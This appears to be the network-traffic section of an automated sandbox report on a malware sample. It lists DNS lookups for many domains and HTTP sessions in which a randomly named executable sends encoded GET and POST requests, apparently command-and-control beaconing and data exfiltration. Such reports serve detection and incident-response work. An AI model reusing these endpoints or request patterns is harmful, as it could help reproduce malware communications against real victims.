                                                    Jul 3, 2024 17:51:59.936331987 CEST192.168.2.61.1.1.10x7f18Standard query (0)www.rz6grmvv.shopA (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:52:14.389023066 CEST192.168.2.61.1.1.10xa11Standard query (0)www.hellokong.xyzA (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:52:28.030612946 CEST192.168.2.61.1.1.10x4d7bStandard query (0)www.architect-usschool.comA (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:52:41.858103037 CEST192.168.2.61.1.1.10x3ebeStandard query (0)www.easybackpage.netA (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:52:55.390187025 CEST192.168.2.61.1.1.10xcf13Standard query (0)www.superunicornpalace.comA (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:53:09.094197035 CEST192.168.2.61.1.1.10xcca7Standard query (0)www.tedjp-x.comA (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:53:23.172265053 CEST192.168.2.61.1.1.10x6fcdStandard query (0)www.3cubesinterior.inA (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:53:43.437366962 CEST192.168.2.61.1.1.10xc374Standard query (0)www.artvectorcraft.storeA (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:53:56.748897076 CEST192.168.2.61.1.1.10xd71bStandard query (0)www.macklaer.comA (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:54:05.158168077 CEST192.168.2.61.1.1.10xe535Standard query (0)www.hondamechanic.todayA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jul 3, 2024 17:51:02.590318918 CEST1.1.1.1192.168.2.60x7f04No error (0)www.fondazionegtech.orgsitestudio.itCNAME (Canonical name)IN (0x0001)false
                                                    Jul 3, 2024 17:51:02.590318918 CEST1.1.1.1192.168.2.60x7f04No error (0)sitestudio.it89.31.76.10A (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:51:18.612556934 CEST1.1.1.1192.168.2.60xd61eNo error (0)www.mengistiebethlehem.com208.91.197.13A (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:51:32.444983006 CEST1.1.1.1192.168.2.60xf0ebNo error (0)www.ad14.fun188.114.96.3A (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:51:32.444983006 CEST1.1.1.1192.168.2.60xf0ebNo error (0)www.ad14.fun188.114.97.3A (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:51:46.548752069 CEST1.1.1.1192.168.2.60x92caNo error (0)www.epicbazaarhub.comepicbazaarhub.comCNAME (Canonical name)IN (0x0001)false
                                                    Jul 3, 2024 17:51:46.548752069 CEST1.1.1.1192.168.2.60x92caNo error (0)epicbazaarhub.com192.185.208.8A (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:52:00.558340073 CEST1.1.1.1192.168.2.60x7f18No error (0)www.rz6grmvv.shop121.254.178.230A (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:52:14.501841068 CEST1.1.1.1192.168.2.60xa11No error (0)www.hellokong.xyz203.161.49.220A (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:52:28.334990978 CEST1.1.1.1192.168.2.60x4d7bNo error (0)www.architect-usschool.com217.160.0.84A (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:52:41.934259892 CEST1.1.1.1192.168.2.60x3ebeNo error (0)www.easybackpage.netparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                    Jul 3, 2024 17:52:41.934259892 CEST1.1.1.1192.168.2.60x3ebeNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:52:55.871165037 CEST1.1.1.1192.168.2.60xcf13No error (0)www.superunicornpalace.comsuperunicornpalace.comCNAME (Canonical name)IN (0x0001)false
                                                    Jul 3, 2024 17:52:55.871165037 CEST1.1.1.1192.168.2.60xcf13No error (0)superunicornpalace.com144.208.124.10A (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:53:09.665852070 CEST1.1.1.1192.168.2.60xcca7No error (0)www.tedjp-x.com162.43.101.114A (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:53:23.537981987 CEST1.1.1.1192.168.2.60x6fcdNo error (0)www.3cubesinterior.in3cubesinterior.inCNAME (Canonical name)IN (0x0001)false
                                                    Jul 3, 2024 17:53:23.537981987 CEST1.1.1.1192.168.2.60x6fcdNo error (0)3cubesinterior.in45.113.122.18A (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:53:43.454359055 CEST1.1.1.1192.168.2.60xc374No error (0)www.artvectorcraft.storeghs.google.comCNAME (Canonical name)IN (0x0001)false
                                                    Jul 3, 2024 17:53:43.454359055 CEST1.1.1.1192.168.2.60xc374No error (0)ghs.google.com172.217.18.19A (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:53:57.084956884 CEST1.1.1.1192.168.2.60xd71bServer failure (2)www.macklaer.comnonenoneA (IP address)IN (0x0001)false
                                                    Jul 3, 2024 17:54:05.577315092 CEST1.1.1.1192.168.2.60xe535No error (0)www.hondamechanic.today64.190.62.22A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • www.fondazionegtech.org
                                                    • www.mengistiebethlehem.com
                                                    • www.ad14.fun
                                                    • www.epicbazaarhub.com
                                                    • www.rz6grmvv.shop
                                                    • www.hellokong.xyz
                                                    • www.architect-usschool.com
                                                    • www.easybackpage.net
                                                    • www.superunicornpalace.com
                                                    • www.tedjp-x.com
                                                    • www.3cubesinterior.in
                                                    • www.artvectorcraft.store
                                                    • www.hondamechanic.today

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.64972489.31.76.10805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:51:02.603748083 CEST351OUTGET /jmiz/?Bp=2LpD8tLh&7Dihs8p=FlIs+r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p/5DHHhHlE1nDIZgKO5qXvVh1+gwmyYcA+2CCaGrmZckpjuvJQ96WUy8TtzIG0Do= HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.fondazionegtech.org
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:51:03.304894924 CEST1236INHTTP/1.1 301 Moved Permanently
                                                    Server: openresty
                                                    Date: Wed, 03 Jul 2024 15:51:03 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Length: 1078
                                                    Connection: close
                                                    Cache-Control: max-age=0, private, must-revalidate, max-age=0, must-revalidate, no-cache, no-store, private
                                                    Location: https://www.fondazionegtech.org/jmiz/?7Dihs8p=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p%2F5DHHhHlE1nDIZgKO5qXvVh1%20gwmyYcA%202CCaGrmZckpjuvJQ96WUy8TtzIG0Do%3D&Bp=2LpD8tLh
                                                    Pragma: no-cache
                                                    Expires: Wed, 03 Jul 2024 15:51:03 GMT
                                                    X-XSS-Protection: 1; mode=block
                                                    X-Content-Type-Options: nosniff
                                                    Age: 0
                                                    X-Cache: MISS
                                                    X-BKSrc: 0.3
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 6e 64 61 7a 69 6f 6e 65 67 74 65 63 68 2e 6f 72 67 2f 6a 6d 69 7a 2f 3f 37 44 69 68 73 38 70 3d 46 6c 49 73 25 32 30 72 38 7a 48 35 49 64 7a 56 79 72 78 46 64 53 59 6a 45 53 48 43 36 46 38 45 44 32 4a 6a 56 38 66 49 68 6f 54 69 45 47 72 69 69 64 77 57 4b 4b 54 76 59 47 46 63 6b 4d 47 79 4e 7a 74 7a 39 66 35 49 31 70 25 32 46 35 44 48 48 68 48 6c 45 31 6e 44 49 5a 67 4b 4f 35 71 58 76 56 68 31 25 32 30 67 77 6d 79 59 63 41 25 32 30 32 43 43 61 47 72 6d 5a 63 6b 70 6a 75 76 4a 51 39 36 57 55 79 38 54 74 7a 49 47 30 44 6f 25 33 44 26 61 6d 70 3b 42 70 3d 32 4c 70 44 38 74 4c 68 27 22 20 2f 3e 0a 0a 20 20 20 20 20 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://www.fondazionegtech.org/jmiz/?7Dihs8p=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p%2F5DHHhHlE1nDIZgKO5qXvVh1%20gwmyYcA%202CCaGrmZckpjuvJQ96WUy8TtzIG0Do%3D&amp;Bp=2LpD8tLh'" /> <title>Redirecting to https://www.fondazionegtech.org/jmiz/?7Dihs8p=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p%2F5DHHhHlE1nDIZgKO5qXvVh1%20gwmyYcA%202CCaGrmZckpjuvJQ96WUy8TtzIG0Do%3D&amp;Bp=2LpD8tLh</title>
                                                    Jul 3, 2024 17:51:03.304919004 CEST499INData Raw: 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 6e 64 61 7a 69 6f 6e 65 67 74 65 63
                                                    Data Ascii: </head> <body> Redirecting to <a href="https://www.fondazionegtech.org/jmiz/?7Dihs8p=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p%2F5DHHhHlE1nDIZgKO5qXvVh1%20gwmyYcA%202CCaGrmZckpjuvJQ96WUy8TtzIG0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.649726208.91.197.13805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:51:18.622067928 CEST631OUTPOST /92z0/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.mengistiebethlehem.com
                                                    Origin: http://www.mengistiebethlehem.com
                                                    Referer: http://www.mengistiebethlehem.com/92z0/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 4c 65 4a 41 30 41 61 6c 79 6c 37 66 7a 6a 68 30 51 6d 2f 39 39 4d 72 45 4a 50 50 7a 71 78 44 4b 30 31 43 64 70 62 77 42 4f 6a 65 6f 58 56 74 76 31 6d 52 76 69 75 63 6d 2f 4e 7a 39 63 65 78 42 31 4f 79 54 54 58 6b 57 4d 53 64 62 39 56 37 41 75 78 49 44 59 4b 6b 2b 37 2f 4c 6b 33 6f 61 6a 63 31 69 2f 34 38 67 32 2b 31 47 53 41 2f 4d 6e 7a 6c 54 44 46 6d 73 76 6a 32 71 4a 4b 73 6d 42 55 47 49 4c 38 76 55 64 47 53 39 55 66 68 32 69 37 39 54 70 45 31 32 34 42 58 65 75 61 57 32 4b 51 78 69 41 54 5a 31 30 2f 44 71 73 6d 32 43 63 6f 75 64 57 52 63 31 71 47 45 37 66 4f 69 6b 43 42 6a 74 78 54 4b 63 73 33 38 52 73
                                                    Data Ascii: 7Dihs8p=LeJA0Aalyl7fzjh0Qm/99MrEJPPzqxDK01CdpbwBOjeoXVtv1mRviucm/Nz9cexB1OyTTXkWMSdb9V7AuxIDYKk+7/Lk3oajc1i/48g2+1GSA/MnzlTDFmsvj2qJKsmBUGIL8vUdGS9Ufh2i79TpE124BXeuaW2KQxiATZ10/Dqsm2CcoudWRc1qGE7fOikCBjtxTKcs38Rs


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.649728208.91.197.13805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:51:21.161761045 CEST655OUTPOST /92z0/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.mengistiebethlehem.com
                                                    Origin: http://www.mengistiebethlehem.com
                                                    Referer: http://www.mengistiebethlehem.com/92z0/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 4c 65 4a 41 30 41 61 6c 79 6c 37 66 78 41 70 30 44 52 54 39 31 4d 72 44 46 76 50 7a 67 52 44 4f 30 31 65 64 70 61 6b 76 4f 56 4f 6f 57 30 78 76 6e 58 52 76 6a 75 63 6d 72 64 7a 34 53 2b 77 4e 31 4f 2f 6d 54 53 45 57 4d 57 31 62 39 51 2f 41 76 44 67 45 43 36 6b 34 7a 66 4c 31 70 59 61 6a 63 31 69 2f 34 38 30 63 2b 31 65 53 41 50 38 6e 31 41 2f 4d 4c 47 73 6f 6b 32 71 4a 42 4d 6d 46 55 47 4a 6f 38 75 49 33 47 51 46 55 66 68 47 69 37 73 54 75 4e 31 32 2b 4c 33 65 34 64 69 76 2f 64 42 76 7a 62 37 5a 69 71 30 75 6b 75 67 44 47 30 64 64 31 44 4d 56 6f 47 47 6a 74 4f 43 6b 6f 44 6a 56 78 42 64 51 4c 34 49 30 50 6c 74 48 69 54 6f 2f 4e 62 37 5a 55 56 6a 35 4a 6f 45 57 68 67 67 3d 3d
                                                    Data Ascii: 7Dihs8p=LeJA0Aalyl7fxAp0DRT91MrDFvPzgRDO01edpakvOVOoW0xvnXRvjucmrdz4S+wN1O/mTSEWMW1b9Q/AvDgEC6k4zfL1pYajc1i/480c+1eSAP8n1A/MLGsok2qJBMmFUGJo8uI3GQFUfhGi7sTuN12+L3e4div/dBvzb7Ziq0ukugDG0dd1DMVoGGjtOCkoDjVxBdQL4I0PltHiTo/Nb7ZUVj5JoEWhgg==


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.649729208.91.197.13805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:51:23.692491055 CEST1668OUTPOST /92z0/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1248
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.mengistiebethlehem.com
                                                    Origin: http://www.mengistiebethlehem.com
                                                    Referer: http://www.mengistiebethlehem.com/92z0/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 4c 65 4a 41 30 41 61 6c 79 6c 37 66 78 41 70 30 44 52 54 39 31 4d 72 44 46 76 50 7a 67 52 44 4f 30 31 65 64 70 61 6b 76 4f 56 47 6f 57 47 56 76 31 45 70 76 78 2b 63 6d 33 74 7a 35 53 2b 77 45 31 4f 33 71 54 53 41 67 4d 51 78 62 2b 32 44 41 37 6e 30 45 4d 4b 6b 34 78 66 4b 79 33 6f 62 33 63 31 53 37 34 2f 4d 63 2b 31 65 53 41 4d 6b 6e 69 46 54 4d 47 6d 73 76 6a 32 72 49 4b 73 6d 39 55 46 34 54 38 75 4d 4e 48 6a 4e 55 47 46 69 69 38 65 37 75 52 6c 32 38 4d 33 66 37 64 6e 33 57 64 42 79 41 62 37 42 49 71 7a 6d 6b 2b 6b 50 62 6f 76 5a 76 58 75 4d 49 65 33 44 63 4b 30 55 34 44 6c 4a 4f 4a 2f 41 76 31 4c 77 7a 75 39 66 48 54 6f 71 33 4f 36 52 49 61 6a 41 6f 68 77 53 72 2b 56 45 66 6c 79 36 44 53 46 2b 6e 70 42 53 45 4c 30 72 63 69 62 41 7a 41 76 64 41 45 2b 4d 49 39 58 4f 2b 4c 47 37 2b 58 4d 58 6b 50 78 37 68 68 71 76 69 67 33 45 2b 2b 37 34 79 30 6a 65 7a 62 46 31 6c 79 51 4d 4e 46 51 6a 5a 59 50 67 51 41 33 32 4a 4f 64 66 36 42 52 38 41 51 58 2f 53 75 6f 6f 64 53 39 6b 6e 68 4c [TRUNCATED]
                                                    Data Ascii: 7Dihs8p=LeJA0Aalyl7fxAp0DRT91MrDFvPzgRDO01edpakvOVGoWGVv1Epvx+cm3tz5S+wE1O3qTSAgMQxb+2DA7n0EMKk4xfKy3ob3c1S74/Mc+1eSAMkniFTMGmsvj2rIKsm9UF4T8uMNHjNUGFii8e7uRl28M3f7dn3WdByAb7BIqzmk+kPbovZvXuMIe3DcK0U4DlJOJ/Av1Lwzu9fHToq3O6RIajAohwSr+VEfly6DSF+npBSEL0rcibAzAvdAE+MI9XO+LG7+XMXkPx7hhqvig3E++74y0jezbF1lyQMNFQjZYPgQA32JOdf6BR8AQX/SuoodS9knhLn604lxTvPpJu48Ztq/89YyBGLGonDUd/Z/dL2mn+wERBcQ8VB0b8LUUp3SqiRXQrNxzjStBejpW7Jn19YJJc08Ouvcp6iYcodht2F2i4Ed6FqL7r0g8Rb7yuVGrtyWjgdEe/d+Yo2BZ4zZ1f0nl3+Pap0gHieXw96vG/f9sQT+sEf7ahHqxHew9A1YMXaQ5+OFAb7pxlMbIKvR51RGjAXbi4Xmg6AIetdMNgR1SS001JWFZlzppdqG7FVZIMiPkWePVPuF/HzbRgD5mZM6y4l78Moyh05WN7qedfJKxMdnSO8v+pI8cNWlrP8RTaq6Uy0W/3uxJ7d4mPzGttcQKqWMkrEfb4+FZpTl9i7WXzuRC+ZfuE8Ja5PyBc9k+dQFlcePFSvaV8jYUbDtc2/jjTmKfBnQV69g7YfBpeiNMNBzK+v4yKC3hRhQ0viw32kXwd9o5pzl459QGtAjHXcQ3LkXLQ/1tSWBCnTX0oE/cx/xWaufRrw9QjT+yKoRhlvYK90UPuZReVrlQfyqZaKf0jJs5WV8oZo6gkAbd7lOb7SMhPqH602T2DxbzPY1d6R9EZEFJuUWqxIJ1VYOaYdHbu3hYrM97loJt9o6cuirlU0WkrD+vD+T/Udg0hlzK2qukty5pNjC5y8QmNxCTvW6JCUzA7lgXyc4Eoxy [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.649730208.91.197.13805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:51:26.223670006 CEST354OUTGET /92z0/?7Dihs8p=Gchg326o6RWN/XFADw/V4eD2MO3apSP8yQOPkbolGTbWXGJL1kFLipwvr6KFDeoH1MC+XiIJPCdl50bZjywkZNBk97uFxrq9QGi9z8UXs1GhAfMLlFrOVkcHu0q9EP6WPl8Zh5k=&Bp=2LpD8tLh HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.mengistiebethlehem.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:51:27.306071043 CEST1236INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 15:51:17 GMT
                                                    Server: Apache
                                                    Set-Cookie: vsid=926vr46756747717851324; expires=Mon, 02-Jul-2029 15:51:17 GMT; Max-Age=157680000; path=/; domain=www.mengistiebethlehem.com; HttpOnly
                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_gSiSyc+dGJYp8FyLVxDu1ZyEcW8c+AALhPBFIKdLEsN3TZEjwZpvx2hbaOkMZE6Pig+SKrSXfSI2gPtBFhg4Pg==
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    Connection: close
                                                    Data Raw: 38 66 61 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED]
                                                    Data Ascii: 8fa4<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn
                                                    Jul 3, 2024 17:51:27.306165934 CEST1236INData Raw: 3d 22 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 7d 69 66 28 21 28 22 63 6d 70 5f 70 72 6f 74 6f 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 70 72 6f 74 6f 3d 22 68 74 74 70 73 3a 22 7d 69
                                                    Data Ascii: ="cdn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=function(){var b=["DE","EN","FR","IT","NO","DA","FI","ES","PT","RO","BG","ET","
                                                    Jul 3, 2024 17:51:27.306179047 CEST411INData Raw: 65 72 43 61 73 65 28 29 29 7d 65 6c 73 65 7b 69 66 28 22 63 6d 70 5f 73 65 74 6c 61 6e 67 22 20 69 6e 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 6c 61 6e 67 21 3d 22 22 29 7b 63 2e 70 75 73 68 28 77 69 6e 64 6f 77 2e 63
                                                    Data Ascii: erCase())}else{if("cmp_setlang" in window&&window.cmp_setlang!=""){c.push(window.cmp_setlang.toUpperCase())}else{if(a.length>0){for(var d=0;d<a.length;d++){c.push(a[d])}}}}}if("language" in navigator){c.push(navigator.language)}if("userLanguag
                                                    Jul 3, 2024 17:51:27.306683064 CEST1236INData Raw: 73 75 62 73 74 72 28 30 2c 32 29 7d 69 66 28 67 2e 69 6e 64 65 78 4f 66 28 62 29 21 3d 2d 31 29 7b 68 3d 62 3b 62 72 65 61 6b 7d 7d 69 66 28 68 3d 3d 22 22 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 64 65 66 61 75 6c 74 6c 61
                                                    Data Ascii: substr(0,2)}if(g.indexOf(b)!=-1){h=b;break}}if(h==""&&typeof(cmp_getlang.defaultlang)=="string"&&cmp_getlang.defaultlang!==""){return cmp_getlang.defaultlang}else{if(h==""){h="EN"}}h=h.toUpperCase();return h};(function(){var u=document;var v=u
                                                    Jul 3, 2024 17:51:27.306781054 CEST224INData Raw: 72 63 3d 6b 2b 22 2f 2f 22 2b 68 2e 63 6d 70 5f 68 6f 73 74 2b 22 2f 64 65 6c 69 76 65 72 79 2f 63 6d 70 2e 70 68 70 3f 22 2b 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 68 26 26 68 2e 63 6d 70 5f 69 64 3e 30 3f 22 69 64 3d 22 2b 68 2e 63 6d 70 5f 69
                                                    Data Ascii: rc=k+"//"+h.cmp_host+"/delivery/cmp.php?"+("cmp_id" in h&&h.cmp_id>0?"id="+h.cmp_id:"")+("cmp_cdid" in h?"&cdid="+h.cmp_cdid:"")+"&h="+encodeURIComponent(g)+(c!=""?"&cmpdesign="+encodeURIComponent(c):"")+(f!=""?"&cmpregulati
                                                    Jul 3, 2024 17:51:27.308218956 CEST1236INData Raw: 6f 6e 6b 65 79 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 66 29 3a 22 22 29 2b 28 72 21 3d 22 22 3f 22 26 63 6d 70 67 70 70 6b 65 79 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 72 29 3a 22 22 29 2b 28
                                                    Data Ascii: onkey="+encodeURIComponent(f):"")+(r!=""?"&cmpgppkey="+encodeURIComponent(r):"")+(n!=""?"&cmpatt="+encodeURIComponent(n):"")+("cmp_params" in h?"&"+h.cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).
                                                    Jul 3, 2024 17:51:27.308228970 CEST224INData Raw: 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 73 63 72 69 70 74 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 68 65 61 64 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3e 30 29 7b 74 5b 30 5d 2e 61 70 70 65 6e 64 43
                                                    Data Ascii: t.length==0){t=v("script")}if(t.length==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}})();window.cmp_addFrame=function(b){if(!window.frames[b]){if(document.body){var a=document.createElement("iframe");a.style.cssText=
                                                    Jul 3, 2024 17:51:27.310937881 CEST1236INData Raw: 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3b 69 66 28 22 63 6d 70 5f 63 64 6e 22 20 69 6e 20 77 69 6e 64 6f 77 26 26 22 63 6d 70 5f 75 6c 74 72 61 62 6c 6f 63 6b 69 6e 67 22 20 69 6e 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 6d 70 5f 75
                                                    Data Ascii: "display:none";if("cmp_cdn" in window&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("title","Intentionally hidden, please ignore");a.setAttribute("role","no
